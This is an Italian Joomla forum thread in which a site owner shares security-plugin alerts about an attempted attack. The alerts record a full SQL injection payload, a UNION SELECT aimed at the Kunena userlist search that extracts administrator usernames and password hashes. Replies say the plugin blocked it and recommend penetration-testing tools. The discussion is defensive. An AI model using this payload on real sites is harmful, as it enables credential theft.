Joomla.it Forum

Non solo Joomla... => Sicurezza => : asaki 08 May 2013, 16:42:14

: Attacco sito joomla?
: asaki 08 May 2013, 16:42:14
Qualche tempo fà ho installato questo plugin- Marco's SQL Injection - LFI Interceptor .

Ora mi sono arrivate tre e-mail con il contenuto sotto riportato e in  più ho trovato sul pannello

amministratore moduli e plugin con il classico lucchetto.

Cosa significa avete consigli ?

Joomla! 2.5.11

:
** Union Select [GET:search] => %' and 1=2) union select 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from jos_users where      usertype=0x53757065722041646d696e6973747261746f72-- ; ** Table name in url [GET:search] => %' and 1=2) -- 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from jos_users where usertype=0x53757065722041646d696e6973747261746f72-- ; ** Union Select [REQUEST:search] => %' and 1=2) union select 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from jos_users where usertype=0x53757065722041646d696e6973747261746f72-- ; ** Table name in url [REQUEST:search] => %' and 1=2) -- 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from jos_users where usertype=0x53757065722041646d696e6973747261746f72-- ; **PAGE / SERVER INFO *REMOTE_ADDR : 178.33.80.217 *HTTP_USER_AGENT : MySuperBot 1.02 *REQUEST_METHOD : GET *QUERY_STRING : option=com_kunena&func=userlist&search=%25%27+and+1=2%29+union+select+1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--+; ** SUPERGLOBALS DUMP (sanitized) *$_GET DUMP -[option] => com_kunena -[func] => userlist -[search] => %' and 1=2) -- 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from -- users where usertype=0x53757065722041646d696e6973747261746f72-- ; *$_POST DUMP *$_COOKIE DUMP *$_REQUEST DUMP -[option] => com_kunena -[func] => userlist -[search] => %' and 1=2) -- 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from -- users where usertype=0x53757065722041646d696e6973747261746f72-- ;
: Re:Attacco sito joomla?
: gonis 08 May 2013, 18:02:37
sei stato attaccato ma il plug-in ha respinto l'attacco teoricamente magari se metti il link ..
: Re:Attacco sito joomla?
: asaki 08 May 2013, 18:41:35
Il sito non sembra  avere  problemi .....ma esiste qualche programma per testare il sito da questo tipo di attacco?


: Re:Attacco sito joomla?
: gonis 09 May 2013, 09:08:52
certo che esiste un programma per controllare i bug del tuo sito joomla e anche altri cms  però i dettagli non te li posso dare scrivi in pm se vuoi ulteriori info
: Re:Attacco sito joomla?
: mau_develop 09 May 2013, 12:30:23
1)  Owasp Joomla vuln scanner  (https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project_-_Roadmap)
2) http://beefproject.com/
3) http://portswigger.net/burp/
4) https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
5) http://grendel.sourceforge.net/

i miei preferiti:
Burp Suite, Grendel, Metasploit

Basta che scarichi Backtrack5 o Backbox http://www.backbox.org/ che sono già dotate di molti tool per penetration test...

dimenticavo... devi leggere parecchio, molto... un tool di per se non fa nulla e non serve a nulla ;)
: Re:Attacco sito joomla?
: asaki 09 May 2013, 17:36:14
Scusate mi sono dimenticato di dire che dopo il primo attacco ho messo in pratica i suggerimenti http://www.joomla.it/notizie/6983-la-vera-sicurezza-per-il-tuo-sito-joomla-e-il-tuo-atteggiamento.html (http://www.joomla.it/notizie/6983-la-vera-sicurezza-per-il-tuo-sito-joomla-e-il-tuo-atteggiamento.html) compreso il cambio nome delle tabelle (7 caratteri alfanumerici)